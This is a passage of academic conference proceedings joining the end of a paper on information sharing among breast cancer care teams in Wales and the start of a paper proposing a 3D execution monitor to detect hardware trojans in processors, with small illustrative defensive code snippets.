from the Map of Medicine (2010i, 2010f, 2010e) and so follow its recommended ICP for this disease.<br />

Using conceptual modelling, we investigated the different healthcare professionals involved in the<br />

treatment of patients, as they carried out their tasks defined by their roles in the six parts of the ICP,<br />

the different HISs used to serve the patient’s treatment at each step, the medical information<br />

generated and stored in these HISs for each task, the IS policies applied, and the inter-professional<br />

communication between the MDT members. Part of the conceptual model that was derived from the<br />

breast cancer ICP (Map of Medicine, 2010h) is shown in Figure 1.<br />


Figure 1: Part of breast cancer treatment conceptual model<br />

4. Results<br />

Although the investigation is still under way, the following results have been found.<br />

First, according to the National Institute for Healthcare and Clinical Excellence (NICE) (2002), breast<br />

cancer diagnosis and treatment is a co-operative activity that involves a range of professionals, both<br />

within and outside the breast cancer unit. We found that there are at least 16 healthcare professionals<br />

involved in the treatment of a patient in this process in Wales. Although each plays a well-defined but<br />

different role, they are increasingly working in teams (Commission for Health Improvement and Audit<br />

Commission, 2001). Annually, each MDT diagnoses and treats 100 new breast cancer patients<br />

(NICE, 2002). The provision of a high quality service requires close co-operation between specialists<br />

from several disciplines and it is essential that care is provided by a breast cancer MDT in a specialist<br />

breast unit (Cancer Services Expert Group, 2008). In addition, there are at least two professionals for<br />

each role in the core breast care team (NICE, 2002). The different MDT members’ roles can be<br />

categorised into three different groups:<br />

Primary care personnel: GP, district nurse, and practice nurse.<br />

Principal specialist personnel (core breast cancer team): breast cancer nurse specialists, clinical<br />

and medical oncologists, radiologists, pathologists, and surgeons.<br />

Affiliated personnel: liaison psychiatrist and/or clinical psychologist, palliative care specialists and<br />

teams, physiotherapists and occupational therapists, surgeons experienced in breast<br />

reconstruction, clinical genetics, pharmacists, and haematologists.<br />

Second, there are at least seven HISs holding information about the patient with each having its own<br />

patient health record. This record stores sensitive and confidential personal and medical information.<br />

Although the HISs collectively adopt and adapt national guidelines, each applies its own and different<br />

policies and guidelines locally. These meet local needs and circumstances (Cancer Services Expert<br />

Group, 2008). The seven HISs found in this scenario and the different types of medical records they<br />

might contain are listed in Table 1 in Appendix A.<br />

Finally, a crucial feature of the breast cancer MDT is its composition, the way it works, and the<br />

coordinated care it offers. This team functions in the context of a cancer unit or centre, which may<br />

consist of one or more sites using shared facilities (NICE, 2002). NICE (2002) and the Commission<br />


for Health Improvement and Audit Commission (CHIAC) (2001) revealed audit and anecdotal<br />

evidence of problems in inter-professional communication and a failure to plan care in a systematic<br />

way between the different professionals involved. Such problems have been linked with complaints<br />

and litigation (NICE, 2002). For example, GPs sometimes lose track of patients during the treatment<br />

period or become unable to discuss the diagnosis and prognosis with patients due to lack of<br />

information from consultants. Furthermore, primary personnel can be unaware that a patient has been<br />

discharged, sometimes without necessary services or equipment being arranged. It can be unclear<br />

whether the GP or consultant is responsible for patient follow-up after treatment. Furthermore, the<br />

HISs are poor in their support of day to day working arrangements, including communication,<br />

appointment systems and shared protocols (CHIAC, 2001). Indeed, even if the care team is ready to<br />

share medical information (CHIAC, 2001), the current HISs do not support this sharing of<br />

information (CHIAC, 2001; Skilton et al., 2009). Finally, although many trusts do not have agreed<br />

policies for the management of cancers, where policies do exist, it is unclear whether they are<br />

followed because practice is not audited (CHIAC, 2001). Furthermore, formal policies and plans<br />

cannot ensure that services are provided in a patient-centred way, without a change in the attitudes<br />

and behaviour of those working with patients (CHIAC, 2001).<br />

5. Discussion and future work<br />

These results identify the different roles of MDT members involved in the treatment of patients with<br />

breast cancer in Wales, the HISs involved, the types of health records created in these systems, and<br />

medical information stored in these different records. This information helped the development of an<br />

understanding of the emerging need for the SCE for MDT members involved in treating patients with<br />

breast cancer. For example, some of the tasks carried out as the patient proceeds through the breast<br />

cancer’s ICP show a clear redundancy in some of the information collected, including, but not limited<br />

to, a clinical assessment and patient history check. It could save time and resources if this information were available to the healthcare professional in charge at the point of treatment. In addition, data<br />

redundancy can cause data inconsistency issues and having a single shared data record (i.e. patient<br />

history) guarantees the availability of up-to-date information for all MDT members. Another example is<br />

that GPs should support patients undergoing diagnosis, treatment and follow-up leading either to cure<br />

or to eventual death. This means GPs should follow patients from the very start of the ICP. Although<br />

patients may start their ICP at different stages, the GP should have direct contact with other breast<br />

cancer MDT members treating the patient in order to be informed about all of the patient’s current<br />

relevant medical information at all times. This would enable effective consultation and follow-up. In<br />

addition, there can be different professionals playing the same role and also one professional playing<br />

different roles. Furthermore, privacy violations can be expected if all of the members can see every<br />

patient’s records (Anderson, 2008). This emphasises the need for effective SCE with systems that<br />

can ensure the availability of life-critical information about the patient’s medical condition based on the<br />

professional’s role at the time of treatment. Also, the breast cancer MDT checks 100 patients<br />

annually. Each of these patients will be following different directions in the same ICP, and in some<br />

cases, following multiple ICPs as well, if the patient suffers from more than one disease. This will be<br />

difficult to manage without the support of an HIS that considers the patient condition as a whole.<br />

Therefore, good inter-professional communication is essential to co-ordinate the activities of all those<br />

involved, and ensure effective communication between professionals working in the primary,<br />

secondary and tertiary sectors of care. For that reason, the breast care MDT must develop and<br />

implement systems that ensure rapid and effective communication between all healthcare<br />

professionals involved in each patient’s treatment management. This would facilitate the provision of<br />

adequate means for communicating information on referral, diagnosis and treatment, follow-up, and<br />

supportive/palliative care throughout the stages of the ICP.<br />

The HISs identified in this research can be studied to identify the IS issues in these systems that<br />

hinder inter-professional communication. This can be achieved by investigating the IS rules applied in<br />

these HISs to protect medical information. This is an important step to take before speaking to all<br />

involved parties in order to know their IS needs to facilitate the SCE with others involved in the<br />

treatment. This can help identify and define the best way to have persistent control over the<br />

information accessed in a distributed environment when it will be moved outside the HIS’s locally<br />

controlled environment. This can be achieved either by agreeing on a set of common rules for all<br />

involved HISs to apply in a neutral administrative domain used for the sharing process, or by<br />

changing the way they work internally by standardising the IS rules. It may be that sharing in either of<br />

these ways is not possible at this point in time. The main aim of this research at the moment is to<br />

facilitate an SCE that can support collaboration among MDT members while guaranteeing persistent<br />


control over shared patient medical information in the future. This would be hard to achieve without<br />

the identification of the IS issues and emerging needs in this dynamic environment through the study<br />

of a real-life scenario.<br />

6. Conclusion<br />

There is a shift today towards collaboration among different healthcare organisations for the common goal of better patient treatment through a move to patient-centric care. In achieving this, IS is essential to the effectiveness and dynamism of collaborative working if its full potential is to be realised. The provision of an SCE for multiple organisations has proved to be a challenge. This paper presents the results of a study into the inter-professional communication needs of a secure cross-organisational information-sharing system in the healthcare domain. The findings in this paper<br />

provide the initial results from the first stage of the project and they will be used to inform further<br />

investigation in the ensuing stages to identify the key IS issues affecting inter-professional<br />

communication, as well as the IS needs in this environment which facilitate the sharing of information<br />

throughout the distributed domain.<br />

7. Appendix A<br />

The following table contains redundancy, since some information types appear in more than one record type. This is indicated by a bracketed list of numbers, where each number refers to the other HIS record type containing this information. This redundancy has two causes: either the information is copied from another record to this system, in which case the original should be the accurate information, or separate readings are taken and the results are stored in these different systems. All records hold administrative/demographic data for each patient, and Table 1 only lists non-administrative information.<br />
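The cross-reference notation used in Table 1 can be generated mechanically: index each information type by the HISs that hold it, then annotate every entry with the other systems holding the same type. The sketch below uses a heavily simplified, invented holdings map for illustration.

```python
# Hypothetical, simplified holdings: HIS number -> information types it holds.
HOLDINGS = {
    1: {"clinical history report", "follow-up plan"},
    2: {"clinical history report", "follow-up plan", "blood test results"},
    3: {"blood test results"},
}


def cross_references(holdings):
    """For each HIS and information type, list the other HISs holding it."""
    index = {}
    for his, types in holdings.items():
        for t in types:
            index.setdefault(t, set()).add(his)   # info type -> holders
    return {
        his: {t: sorted(index[t] - {his}) for t in types}
        for his, types in holdings.items()
    }


refs = cross_references(HOLDINGS)
assert refs[1]["clinical history report"] == [2]  # also held by HIS 2
assert refs[2]["blood test results"] == [3]       # also held by HIS 3
```

An empty list in the result marks information held by only one system, which is exactly the information with no bracketed annotation in Table 1.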

Table 1: HISs used in treating patients with breast cancer in Wales, UK<br />

1. GP-System. Health record type: GP-records. Information stored: Clinical presentation report; Clinical assessment report; Clinical history report-[2]; Physical examination report-[2]; Filled referral form (including patient details, referring doctor details, medical context, and referral information)-[2]; Information about referred patients’ diagnosis (by the end of the Triple Assessment pathway)-[2]; MDT recommendations and treatment plans-[2,6,7]; Given treatment plan-[2]; Given medication-[2]; Follow-up plan-[2]; Follow-up visits report-[2].<br />

2. Secondary-Care-System. Health record type: Secondary-care-records. Information stored: Referral form-[1]; Clinical history report-[1]; Clinical examination code-[1]; Tests requests (e.g. blood, ultrasound, X-ray test)-[3,4]; Blood test results report-[3]; X-ray and ultrasound results report-[4]; Pathologists’ reports-[5]; Radiologists’ and oncologists’ results reports-[6]; Surgeons’ reports-[7]; General patient case notes (including BC diagnostic, staging, pathology information, histology reports, and tests’ result reports)-[1,3,4,5,6,7]; General information addressing the patient’s specific situation (in leaflet, audio or video CD format); MDT recommendations and treatment plans-[1,6,7]; Given treatment plan; Follow-up plan; Follow-up visits report.<br />

3. Hematology-Laboratory-System. Health record types: Whole blood samples (for FBC); Blood for grouping, antibody screening and saving and/or cross-matching; Request forms for grouping, antibody screening and cross-matching; Results of grouping, antibody screening and cross-matching; Lab file cards/working records of test results. Information stored: Tests requests-[2]; General patient case notes-[1,2,4,5,6,7]; Blood test results report; FBC report; Renal and liver function test report; Blood calcium test report.<br />

4. X-ray-System. Health record types: X-ray films records; X-ray reports (including reports for all imaging modalities); Breast screening X-rays records; Ultrasound records. Information stored: Test requests-[2]; General patient case notes-[1,2,3,5,6,7]; Mammography report; X-ray images; Ultrasound report; Ultrasound images; MRI report; MRI images; Isotope bone scan; CT report and CXR image; Abdomen ultrasound image; Echocardiogram scan report and scan image; DEXA scanning report and image; Administrative information/demographic data-[1,2,3,4,6,7].<br />

5. Pathology-Laboratory-System. Health record types: Pathology records; Human tissue; Lab file cards/working records of test results. Information stored: Test requests from Oncologist-[6]; General patient case notes-[1,2,3,4,6,7]; Biopsy report with diagnosing code; FNA report with diagnosing code; Tissue samples; The cancer tumour size, nodes, metastasis (TNM) staging code; Tumour grade; Histology report with biopsy diagnosing code.<br />

6. Oncology-System. Health record types: Oncology records; Radiation dose records for classified persons. Information stored: Test requests-[2]; General patient case notes-[1,2,3,4,5,7]; MDT recommendations and treatment plan-[1,2,7]; Test requests to Pathologist; Cancer TNM staging code-[5]; Tumour grade-[5]; Neo-adjuvant endocrine therapy report; Neo-adjuvant chemotherapy report; Chemotherapy drugs list and dose; Radiotherapy report; Adjuvant chemotherapy report (including the risk analysis); Hormonal therapy report; Endocrine therapy report; Bisphosphonates report.<br />

7. Surgical-System. Health record types: Operating theatre registers; Surgical records. Information stored: Surgical report; General patient case notes-[1,2,3,4,5,6]; MDT recommendations and treatment plans-[1,2,6].<br />

References<br />

Al-Salamah, H., Gray, A., Allam, O. and Morrey, D., (2009). Change Management along the Integrated Care<br />

Pathway. In: the 14th International Symposium on Health Information Management Research. Bath P,<br />

Petersson G, AND Steinschaden T editors. Kalmar, Sweden. pp. 53- 66.<br />

Alfieri, R. et al., (2003). VOMS, an Authorization System for Virtual Organizations. In: the 1st European Across Grids Conference. Santiago de Compostela. pp. 33-40.<br />

Allam, O., (2006). A Holistic Analysis Approach to Facilitating Communication between General Practitioners and<br />

Cancer Care Teams. Thesis. Department of Computer Science & Informatics. Cardiff University. Cardiff. pp.<br />

182.<br />

Anderson, R. J., (2008). Security Engineering 2nd ed. Indianapolis: Wiley Publishing.<br />

285


Shada Alsalamah et al.<br />


287


3D Execution Monitor (3D-EM): Using 3D Circuits to Detect<br />

Hardware Malicious Inclusions in General Purpose<br />

Processors<br />

Michael Bilzor<br />

U.S. Naval Postgraduate School, Monterey, California, USA<br />

mbilzor@nps.edu<br />

Abstract: Hardware malicious inclusions (MIs), or "hardware trojans," are malicious artifacts planted in<br />

microprocessors. They present an increasing threat to computer systems due to vulnerabilities at several stages<br />

in the processor manufacturing and acquisition chain. Existing testing techniques, such as side-channel analysis<br />

and test-pattern generation, are limited in their ability to detect malicious inclusions. These hardware attacks can<br />

allow an adversary to gain total control over a system, and are therefore of particular concern to high-assurance<br />

customers like the U.S. Department of Defense. In this paper, we describe how three-dimensional (3D) multilayer<br />

processor fabrication techniques can be used to enhance the security of a target processor by providing<br />

secure off-chip services, monitoring the execution of the target processor's instruction set, and disabling<br />

potentially subverted control circuits in the target processor. We propose a novel method by which some<br />

malicious inclusions, including those not detectable by existing means, may be detected and potentially mitigated<br />

in the lab and in fielded, real-time operation. Specifically, a target general-purpose processor, in one layer, is<br />

joined using 3D interconnects to a separate layer, which contains an Execution monitor for detecting deviations<br />

from the target processor's specified behavior. The Execution monitor layer is designed and fabricated separately<br />

from the target processor, using a trusted process, whereas the target processor may be fabricated by an<br />

untrusted source. For high-assurance applications, the monitor layer may be joined to the target layer, after each<br />

has been separately fabricated. In the context of existing computer security theory, we discuss the limits of what<br />

an Execution monitor can do, and describe how one might be constructed for a processor. Specifically, we<br />

propose that the signals which carry out the target processor's instruction set actions may be described in a<br />

stateful representation, which serves as the input for a finite-automaton-based Execution monitor, whose<br />

acceptance predicate indicates when the target processor's behavior violates its specification. We postulate a<br />

connection between Execution monitor theory and the proposed 3D processor monitoring system, which can be<br />

used to detect a specific class of malicious inclusions. Finally, we present the results of our first monitor<br />

experiment, in which we designed and tested (in simulation) a simple Execution monitor for a small open-source<br />

32-bit processor design known as the ZPU. We analyzed the ZPU processor to determine which signals must be<br />

monitored, designed a system of monitor interconnects in the hardware description language (HDL)<br />

representation, developed a stateful representation of the microarchitectural behavior of the ZPU, and designed<br />

an Execution monitor for it. We demonstrated that the Execution monitor identifies correct operation of the<br />

original, unmodified ZPU, as it executed arbitrary code. Having introduced some minor deviations to the ZPU<br />

processor's microarchitectural design, we then showed in simulation that the Execution monitor correctly<br />

detected the deviations, in the same way that it might detect the presence of some malicious inclusions in a<br />

modern processor.<br />

Keywords: processor, security, trojan, subversion, detection<br />

1. The threat to microprocessors<br />

Today's Defense Department relies on advanced microprocessors for its high-assurance needs.<br />

Those applications include everything from advanced weaponry, fighter jets, ships, and tanks, to<br />

satellites and desktop computers for classified systems. Considerable attention and resources have been<br />

devoted to securing the software that runs these devices and the networks on which they<br />

communicate. However, two significant trends make it increasingly important that we also focus on<br />

securing the underlying hardware that runs these high-assurance devices. The first is the U.S.'<br />

greater reliance on processors produced overseas. The second is the increasing ease with which<br />

hardware may be maliciously modified and introduced into the supply chain.<br />

Every year, more microprocessors destined for U.S. Department of Defense (DoD) systems are<br />

manufactured overseas, and fewer are made inside the U.S. As a result, there is a greater risk of<br />

processors being manufactured with malicious inclusions (MIs), which could compromise high-assurance<br />

systems. This concern was highlighted in a 2005 report by the Defense Science Board,<br />

which noted a continued exodus of high-technology fabrication facilities from the U.S. (Defense<br />

Science Board 2005). Since this report, "more U.S. companies have shifted production overseas,<br />

have sold or licensed high-end capabilities to foreign entities, or have exited the business."<br />

(McCormack 2008) One of the Defense Science Board report's key findings reads, "There is no longer<br />

288


Michael Bilzor<br />

a diverse base of U.S. integrated circuit fabricators capable of meeting trusted and classified chip<br />

needs." (Defense Science Board 2005)<br />

Today, most semiconductor design still occurs in the U.S., but some design centers have recently<br />

emerged in Taiwan and China (Yinung 2009). In addition, major U.S. corporations are moving more<br />

of their front-line fabrication operations overseas for economic reasons:<br />

"Press reports indicate that Intel received up to $1 billion in incentives from the Chinese<br />

government to build its new front-end fab in Dalian, which is scheduled to begin production in<br />

2010." (Nystedt 2007)<br />

"Cisco Systems has pronounced that it is a 'Chinese company,' and that virtually all of its products<br />

are produced under contract in factories overseas." (McCormack 2008)<br />

"Raising even greater alarm in the defense electronics community was the announcement by IBM<br />

to transfer its 45-nanometer bulk process integrated circuit technology to Semiconductor<br />

Manufacturing International Corp., which is headquartered in Shanghai, China. There is a concern<br />

within the defense community that it is IBM's first step to becoming a 'fab-less' semiconductor<br />

company." (McCormack 2008)<br />

Since modern processors are designed in software, the processor design plans become a potential<br />

target of attack. Malicious logic can also be inserted after a chip has been manufactured, such as with<br />

focused ion beam milling (Adee 2009).<br />

Though reports of actual malicious inclusions are often classified or kept quiet for other reasons,<br />

some reports do surface, like this unverified account (Adee 2009):<br />

According to a U.S. defense contractor who spoke on condition of anonymity, a<br />

'<strong>European</strong> chip maker' recently built into its microprocessors a "kill switch" that could be<br />

accessed remotely. French defense contractors have used the chips in military<br />

equipment, the contractor told IEEE Spectrum. If in the future the equipment fell into<br />

hostile hands, 'the French wanted a way to disable that circuit,' he said.<br />

According to the New York Times, such a "kill switch" may have been used during the 2007 Israeli<br />

raid on a suspected Syrian nuclear facility under construction (Markoff 2009).<br />

2. Characterizing processor malicious inclusions<br />

Several academic research efforts have demonstrated the insertion of MIs into general-purpose<br />

processor designs. In one example, King, et al., show how a very small change in the design of a<br />

processor facilitates "escalation-of-privilege" and "shadow mode" attacks, each of which can allow an<br />

adversary to gain arbitrary control over the targeted system (King 2009). In another example, Jin, et<br />

al., show how small, hard-to-detect MIs can allow an adversary to gain access to a secret encryption<br />

key (Jin 2009). Researchers have created various taxonomies of MIs, based on their characteristics.<br />

One example comes from Tehranipoor and Koushanfar (Tehranipoor 2010), from which the following<br />

simplified diagram (Figure 1) is derived:<br />

The components of a simple general-purpose processor are generally classifiable according to their<br />

function. For example, a circuit in a microprocessor may participate in control-flow execution<br />

(participate in fetch-decode-execute-retire), be part of a data path (like a bus), execute storage and<br />

retrieval (like a cache controller), assist with control, test and debug (as in a debug circuit), or perform<br />

arithmetic and logic computation (like an arithmetic-logic circuit, or ALU). This list may not be<br />

exhaustive, and some circuits' functions may overlap, but broadly speaking we can subdivide the<br />

component circuits in a processor using these classifications.<br />

The main focus of our research is the detection of malicious inclusions which target the first category,<br />

control flow circuits. In considering processor malicious inclusions, it is worth noting that in some<br />

cases a detection strategy is warranted, and in others a mitigation strategy may be preferable. Table<br />

1 lists each of the circuit functional types mentioned above, and pairs it with a potential 3D detection<br />

and/or mitigation strategy.<br />

289



Figure 1: A taxonomy of malicious inclusions, modified slightly from (Tehranipoor 2010)<br />

Table 1: Processor circuit type, with some associated MI mitigation and detection techniques<br />

Circuit Type Detection/Mitigation Technique<br />

Control Flow Control Flow Execution Monitor<br />

(subject of our experiments)<br />

Chip Control, Test, and Debug Keep-Alive Protections<br />

Data Paths Datapath Integrity Verification<br />

Memory Storage and Retrieval Load/Store Verification<br />

Arithmetic and Logic Computation Arithmetic/Logic Verification<br />

In Figure 2, we update the malicious inclusion taxonomy from Figure 1, and associate each MI action<br />

type with a matching detection or mitigation technique:<br />

Figure 2: Malicious inclusion taxonomy, with associated mitigation and detection methods<br />

290



In our current experiments, we intend to demonstrate an implementation of the execution monitor,<br />

which monitors the operation of the instruction set of a general-purpose processor, and should detect<br />

MIs from the fourth action category, "Modify Functionality." MIs from this category might, for example,<br />

be designed to allow an adversary to leak secret information or to gain privileged access in a system.<br />

3. Limits of existing processor tests<br />

General-purpose processor designs go through verification testing before fabrication begins. Design-phase<br />

verification usually involves construction of a verification environment using tools like<br />

SystemVerilog and the Open Verification Methodology (OVM) (Iman 2008). There are several<br />

shortfalls with verifying processor designs, with respect to malicious inclusions:<br />

Not all processor designs, or portions of designs, undergo formal verification. Processor designs<br />

also may incorporate reused sub-components, as well as unverified open-source or third-party<br />

components.<br />

Processor design verification tends to ensure that the processor correctly executes its intended<br />

functions, but usually is not designed to verify the absence of additional, possibly malicious<br />

functionality, such as an MI.<br />

Processor design verification usually cannot be exhaustive, due to the exponential number of<br />

possible internal configurations of a processor. Modern functional verification often focuses on<br />

generating a sufficient number of random test cases to be reasonably confident of a design's<br />

correctness; as a result, rare-event malicious triggers may not be detected.<br />
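The last point can be illustrated with a back-of-envelope calculation (our own illustration; the figures are hypothetical, not from any cited study). Consider an MI whose trigger fires only when one specific 32-bit value appears on a monitored bus:<br />

```python
# Back-of-envelope estimate (illustrative): a trigger that fires only when
# one specific 32-bit value appears on a monitored bus is essentially
# invisible to random functional testing.
trigger_space = 2 ** 32          # possible values of the triggering operand
random_tests = 10 ** 7           # a generous random-simulation campaign
p_hit_once = 1 / trigger_space   # chance one random test supplies the value

# Probability that the entire campaign never exercises the trigger
p_miss_all = (1 - p_hit_once) ** random_tests
print(f"P(trigger never fires in {random_tests:,} tests) = {p_miss_all:.4f}")
```

Even ten million random tests leave the trigger unexercised with probability above 99%, which is why rare-event triggers survive conventional random verification.<br />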

Once a processor has been fabricated, some sample dies may be examined, destructively or<br />

nondestructively, for the presence of MIs. Using destructive methods, a processor's top layers may be<br />

removed and its metal layers examined for anomalies, using specialized imagers. Since processors<br />

cannot be used operationally after destructive testing, it is limited to a small sample set, and not a<br />

complete solution.<br />

Non-destructive processor tests include various power and timing "fingerprinting" techniques.<br />

Essentially, using sensitive measuring equipment, a tester can drive a processor's inputs with test<br />

patterns and measure current and timing delays at the outputs. The results from the device under test<br />

are statistically compared with the results from presumed-good, or "golden," sample processors. The<br />

principal limitations of nondestructive fingerprint-based testing include: (Agrawal 2007, Jin 2008, Jin<br />

2009, Rad 2008)<br />

Such tests rely on the existence of a presumed-good "golden" sample. Therefore, if the<br />

subversion occurred in the design phase, and hence was cast into all the fabricated processors,<br />

the subversion will not be detected through these comparisons.<br />

Very small MIs, involving fewer than around 0.1% of the transistors on a die, are generally not<br />

detectable using these techniques, and it is not very difficult for an attacker to design a subversion<br />

which remains below this threshold.<br />
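A minimal sketch of such fingerprint comparison (our own illustration, assuming a simple per-sample mean and standard-deviation test; real side-channel analyses use far richer statistics) shows why an MI whose contribution stays inside the golden chips' process-variation spread goes undetected:<br />

```python
import statistics

def fingerprint_deviation(golden_traces, dut_trace):
    """Compare a device-under-test power trace against per-sample statistics
    from presumed-good ("golden") chips. Returns the largest deviation in
    units of golden-sample standard deviations. Illustrative sketch only."""
    worst = 0.0
    for i, dut_sample in enumerate(dut_trace):
        samples = [trace[i] for trace in golden_traces]
        mu = statistics.mean(samples)
        sigma = statistics.stdev(samples) or 1e-9  # guard against zero spread
        worst = max(worst, abs(dut_sample - mu) / sigma)
    return worst

# Golden chips exhibit process variation (noise); a sufficiently small MI's
# contribution hides inside that spread, which is the limitation noted above.
golden = [[1.00, 2.00, 1.50], [1.02, 1.98, 1.52], [0.98, 2.02, 1.49]]
clean_dut = [1.01, 2.01, 1.50]
print(fingerprint_deviation(golden, clean_dut))  # well under a 3-sigma alarm
```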

4. 3D fabrication and potential security applications<br />

Because feature sizes are shrinking very near to their theoretical limits, processor manufacturers are<br />

constrained in improving performance through the use of traditional methods on a single-layer design.<br />

As a result, manufacturers and designers have been rapidly advancing the technologies needed to<br />

make "3D" processors. In a 3D processor design, two or more silicon layers are joined together face<br />

to face or face to back, using a variety of interconnection methods. As a result, off-chip resources, like<br />

extra cache memory or another processor, which might normally be elsewhere on the printed circuit<br />

board, are physically much closer to the primary processing layer, resulting in shorter communication<br />

delays, and hence better performance (Mysore 2006). Though the development of 3D interconnect<br />

technology has been driven by performance, several security-relevant applications have also been<br />

suggested (Valamehr 2010):<br />

3D security services, such as those that might be found in a security coprocessor, could be made<br />

available to the primary processor layer.<br />

A 3D layer acting as a "control plane" could monitor and restrict the behavior of a target processor<br />

in the "computation plane." For example, the control plane processor could facilitate the<br />

segregation of multi-level data by partitioning the cache lines inside the target.<br />

291



Another potential security-relevant application of 3D is the Execution monitor, or 3D-EM. With a 3D-<br />

EM, key control signals of the target processor, or computation plane, are monitored, through 3D<br />

interconnects, by another processor in the control plane. The EM's sole purpose is to monitor the<br />

execution of the target processor, and identify when the sequences of observed signal values deviate<br />

from those sequences allowed by the target processor's design. Design and construction of a 3D-EM<br />

alongside a target processor could occur as follows:<br />

The target processor's architectural design is developed and translated into hardware design<br />

language (HDL).<br />

From the design documents and HDL specification, the processor's design undergoes normal<br />

functional verification (e.g., formal methods, OVM, simulation, FPGA test), to determine:<br />

Correctness of the expected functionality (as normal).<br />

Absence of any malicious additional functionality (additional steps for MI detection).<br />

Once the target's HDL design is finalized, the target's execution control signals (those which must<br />

be monitored) are identified. An HDL version of the monitor is constructed. One of our research<br />

goals is to develop a "recipe" for these two steps.<br />

During floorplanning (including power, area, and heat optimizations) of the target, the appropriate<br />

3D monitoring interconnects are physically laid out, from the target layer to the monitor layer.<br />

The target's final floorplanned design is transferred to a set of fabrication masks and sent to the<br />

foundry for production. The target processors may be fabricated at either a trusted or an untrusted<br />

foundry.<br />

Target processors which are not destined for high-assurance applications are finished and<br />

assembled onto printed circuit boards.<br />

Target processors which are destined for monitored, high-assurance applications are shipped for<br />

further assembly.<br />

The monitors are fabricated at a trusted facility.<br />

The target processors and monitors are then joined, assembled onto printed circuit boards, and<br />

tested again.<br />

Adding the extra steps to co-design a monitor will slow the overall development process; one goal of<br />

our research is to find ways to automate or semi-automate the monitor co-design portion. The target<br />

processors could still be produced in large volume for non-high-assurance customers, where<br />

monitoring is not required, in order to keep their unit cost down. Only the high-assurance customers<br />

need to go through the extra steps of designing, fabricating, and joining the monitor layer. The monitor<br />

layer might be placed above or below the target layer. One possible arrangement is shown in Figure<br />

3:<br />

Figure 3: A possible 3D arrangement of the monitor and target layers, adapted from (Puttaswamy<br />

2006)<br />

292


5. Execution monitor theory<br />


Several of the important characteristics of an EM were described by Schneider (Schneider 2000). A<br />

brief summary of some of the conclusions is listed below (see source for formal definitions of safety<br />

property and security automata).<br />

The target's execution is characterized by (finite or infinite) sequences, where Ψ denotes a<br />

universe of all possible sequences, and a target S defines a subset ΣS of Ψ corresponding to the<br />

executions of S. The sequences may consist of atomic actions, events, or system states,<br />

for example.<br />

A security policy is specified by giving a predicate on sets of executions. A target S satisfies<br />

security policy P if and only if P(ΣS) equals true.<br />

If the set of executions for a security policy P is not a safety property, then an enforcement<br />

mechanism from an EM does not exist for P.<br />

EM-enforceable security policies are composable: when multiple EMs are used in tandem, the<br />

policy enforced by the aggregate is the conjunction of the policies enforced by each in isolation.<br />

A security automaton can serve as the basis for an enforcement mechanism in an EM.<br />
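These conclusions can be sketched as follows (a Python illustration of our own devising, not code from Schneider's paper): a security automaton rejects an execution as soon as any prefix violates its policy — the defining shape of a safety property — and the conjunction of several EM policies is enforced by running the automata in tandem:<br />

```python
# Minimal sketch of a Schneider-style security automaton (names invented
# for illustration): it consumes an execution trace one action at a time
# and rejects as soon as a prefix violates the policy.
class SecurityAutomaton:
    def __init__(self, start, transitions):
        # transitions: {(state, action): next_state}; a missing entry
        # means the action is prohibited in that state.
        self.state = start
        self.transitions = transitions
        self.ok = True

    def step(self, action):
        nxt = self.transitions.get((self.state, action))
        if nxt is None:
            self.ok = False        # violation: once false, stays false
        else:
            self.state = nxt
        return self.ok

def enforce_all(automata, trace):
    """Composability: the aggregate policy is the conjunction of the
    individual EM policies."""
    return all(all(a.step(act) for act in trace) for a in automata)

# Policy: 'write' may only follow 'auth'.
p1 = SecurityAutomaton('idle', {('idle', 'auth'): 'authed',
                                ('idle', 'read'): 'idle',
                                ('authed', 'write'): 'idle',
                                ('authed', 'read'): 'authed'})
print(enforce_all([p1], ['read', 'auth', 'write']))  # → True
```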

Consider a set of signals A which are dependent on the value of an instruction opcode in a processor.<br />

We assume that, within the set A, all the signals change values synchronously, as they would in a<br />

common clock domain. The possible values of a single member a ∈ A may be described by a set of<br />

finite, discrete values V (e.g., logic low, logic high, high impedance, etc.). These physical values are<br />

represented discretely in an HDL description, as well. For example, a VHDL "standard logic" signal is<br />

nine-valued: V = {U, X, 0, 1, Z, W, L, H, -}. If set A contains n signals, we can denote them a1, a2, ...<br />

an. For a target processor S, containing the signals of A (and others), the state of A at time t may be<br />

denoted At, and the execution trace of the signals in A of processor S may be described as an<br />

ordered set of states ΣS = {A0, A1, ... }. Here, Ψ represents the universe of all possible execution<br />

traces.<br />
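The formalism above can be sketched concretely (an illustrative model of ours, not code from the paper), with V taken to be VHDL's nine std_logic values and each state At represented as a tuple of signal assignments:<br />

```python
# Sketch of the trace formalism: each signal in A takes one of VHDL's nine
# std_logic values; the state of A at time t is a tuple, and an execution
# trace is the sequence of those tuples. Signal names are hypothetical.
STD_LOGIC = {'U', 'X', '0', '1', 'Z', 'W', 'L', 'H', '-'}  # the value set V

def make_state(**signals):
    """Build one state A_t as an ordered tuple of (name, value) pairs,
    rejecting any value outside V."""
    for name, value in signals.items():
        if value not in STD_LOGIC:
            raise ValueError(f"{name}={value!r} is not a std_logic value")
    return tuple(sorted(signals.items()))

# A three-signal set A = {mem_read, mem_write, interrupt}, sampled per clock:
trace = [
    make_state(mem_read='0', mem_write='0', interrupt='0'),  # A_0
    make_state(mem_read='1', mem_write='0', interrupt='0'),  # A_1
    make_state(mem_read='0', mem_write='1', interrupt='0'),  # A_2
]
print(len(trace), trace[1])
```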

We hypothesize that, in terms of instruction set execution:<br />

The signals comprising A may be systematically identified,<br />

The permitted and prohibited sequences of signal states, defining P(ΣS) = True and P(ΣS) = False,<br />

may be inferred from the processor's specification and HDL definition, and<br />

A 3D-EM developed using our construction meets the criteria of a security automaton, enforcing a<br />

safety property.<br />

One goal of our research is to demonstrate that a 3D processor Execution monitor can be developed<br />

which satisfies the conditions of (Schneider 2000) and is able to detect a certain class of MI -<br />

specifically, an MI which causes the processor's instruction-control signals, comprising the<br />

microarchitectural state of the machine, to deviate from their allowable control flow.<br />

6. Experimental evaluation<br />

The ZPU is a simple general-purpose, open-source processor, whose VHDL design we obtained from<br />

OpenCores.org (OpenCores 2010). The ZPU uses 32-bit operands and a subset of the MIPS<br />

instruction set. It has a stack-based architecture, without an accumulator, and no internal processor<br />

registers. It is an unpipelined, single-core design, supporting interrupts, but with no privilege rings or<br />

other complex features. It is intended primarily for system-on-chip implementations in FPGAs.<br />
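A toy model in the spirit of the ZPU's stack-based execution makes the architecture concrete (the opcode names and semantics below are simplified illustrations of a stack machine, not the actual ZPU instruction set):<br />

```python
# Toy stack machine illustrating a stack-based architecture like the ZPU's:
# all operands live on a stack, with no general-purpose registers.
# Opcodes here are simplified illustrations, not real ZPU opcodes.
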